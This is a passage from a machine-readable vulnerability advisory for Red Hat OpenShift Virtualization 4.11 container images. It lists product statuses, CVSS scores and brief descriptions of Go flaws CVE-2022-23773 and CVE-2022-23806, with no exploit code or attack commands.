"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2053541", }, ], notes: [ { category: "description", text: "A flaw was found in the go package of the cmd library in golang. The go command could be tricked into accepting a branch, which resembles a version tag. This issue could allow a remote unauthenticated attacker to bypass security restrictions and introduce invalid or incorrect tags, reducing the integrity of the environment.", title: "Vulnerability description", }, { category: "summary", text: "golang: cmd/go: misinterpretation of branch names can lead to incorrect access control", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-23773", }, { category: "external", summary: "RHBZ#2053541", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053541", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-23773", url: "https://www.cve.org/CVERecord?id=CVE-2022-23773", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-23773", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-23773", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", url: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", }, ], release_date: "2022-02-11T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: cmd/go: misinterpretation of branch names can lead to incorrect access control", }, { cve: "CVE-2022-23806", cwe: { id: "CWE-252", name: "Unchecked Return Value", }, discovery_date: "2022-02-11T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2053429", }, ], notes: [ { category: "description", text: "A flaw was found in the elliptic package of the crypto library in golang when the IsOnCurve function could return true for invalid field elements. This flaw allows an attacker to take advantage of this undefined behavior, affecting the availability and integrity of the resource.", title: "Vulnerability description", }, { category: "summary", text: "golang: crypto/elliptic: IsOnCurve returns true for invalid field elements", title: "Vulnerability summary", }, { category: "other", text: "Red Hat Enterprise Linux 8 and 9 are affected because the code-base is affected by this vulnerability.\n\nRed Hat Product Security has rated this issue as having a Moderate security impact. The issue is not currently planned to be addressed in future updates for Red Hat Enterprise Linux 7; hence, marked as Out-of-Support-Scope. \n\nRed Hat Developer Tools - Compilers (go-toolset-1.16 & 1.17), will not be addressed in future updates as shipped only in RHEL-7, hence, marked as Out-of-Support-Scope.\n\nFor additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/ and Red Hat Enterprise Linux Life Cycle & Updates Policy: https://access.redhat.com/support/policy/updates/errata/.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", 